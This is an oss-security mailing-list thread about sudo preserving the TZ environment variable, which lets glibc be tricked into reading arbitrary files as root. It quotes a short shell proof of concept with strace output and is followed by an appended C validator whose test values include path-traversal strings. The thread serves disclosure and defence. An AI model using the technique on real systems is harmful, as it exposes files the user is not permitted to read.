Date: Wed, 15 Oct 2014 19:52:50 -0400
From: Dan McDonald <danmcd@...iti.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Re: Abusing TZ for fun (and little profit)

Libraries that use TZ (or any environment variable) should be careful.  For example...

http://src.illumos.org/source/xref/illumos-gate/usr/src/lib/libc/port/gen/localtime.c#1417

Thanks for the reality check.  Glad we passed.

Dan

Sent from my iPhone (typos, autocorrect, and all)

> On Oct 15, 2014, at 6:35 PM, Jakub Wilk <jwilk@...lk.net> wrote:
> 
> By default, sudo preserves the TZ variable[1] from the user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program into reading an arbitrary file. PoC:
> 
> $ echo moo > tz
> $ chmod 0 tz
> $ cat tz
> cat: tz: Permission denied
> $ TZ=$PWD/tz sudo -u root strace -e read date
> read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512
> read(3, "moo\n", 4096)                  = 4
> read(3, "", 4096)                       = 0
> Wed Oct 15 20:42:42  2014
> +++ exited with 0 +++
> 
> 
> Procmail is another program that recklessly whitelists TZ[2].
> 
> 
> [1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
> [2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13
> 
> -- 
> Jakub Wilk
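
One way a privileged wrapper could vet TZ before preserving it for the target program, added here as an example; it is not code from sudo, procmail or illumos. The helper name tz_value_is_safe, the ZONEINFO_DIR path and the TZ_MAX_LEN bound are assumptions, and the sample values are constructed.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define ZONEINFO_DIR "/usr/share/zoneinfo"  /* assumed zoneinfo location */
#define TZ_MAX_LEN   4096                   /* assumed upper bound on length */

/* Hypothetical helper: true if a TZ value may be passed to a privileged child. */
bool tz_value_is_safe(const char *tz)
{
    const char *p;
    char prev = '/';            /* treat start of string as a component start */

    if (tz == NULL)
        return false;
    if (*tz == ':')             /* optional leading ':' before a file name */
        tz++;
    if (*tz == '\0' || strlen(tz) >= TZ_MAX_LEN)
        return false;           /* conservative: empty or oversized value */
    if (*tz == '/') {           /* absolute path: only under ZONEINFO_DIR */
        size_t n = strlen(ZONEINFO_DIR);
        if (strncmp(tz, ZONEINFO_DIR, n) != 0 || tz[n] != '/')
            return false;
    }
    for (p = tz; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (isspace(c) || !isprint(c))
            return false;
        /* reject ".." as a whole path component */
        if (prev == '/' && c == '.' && p[1] == '.' &&
            (p[2] == '/' || p[2] == '\0'))
            return false;
        prev = *p;
    }
    return true;
}

int main(void)
{
    /* Constructed sample values, including the shape used in the PoC above. */
    const char *samples[] = { "Europe/Warsaw", "EST5EDT", "/home/user/tz",
                              ":/etc/hostname", "../../etc/hostname",
                              "/usr/share/zoneinfo/../../../etc/hostname" };
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("%-45s %s\n", samples[i],
               tz_value_is_safe(samples[i]) ? "keep" : "drop");
    return 0;
}
```

A caller would drop TZ from the child's environment whenever the helper returns false, rather than trying to repair the value.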
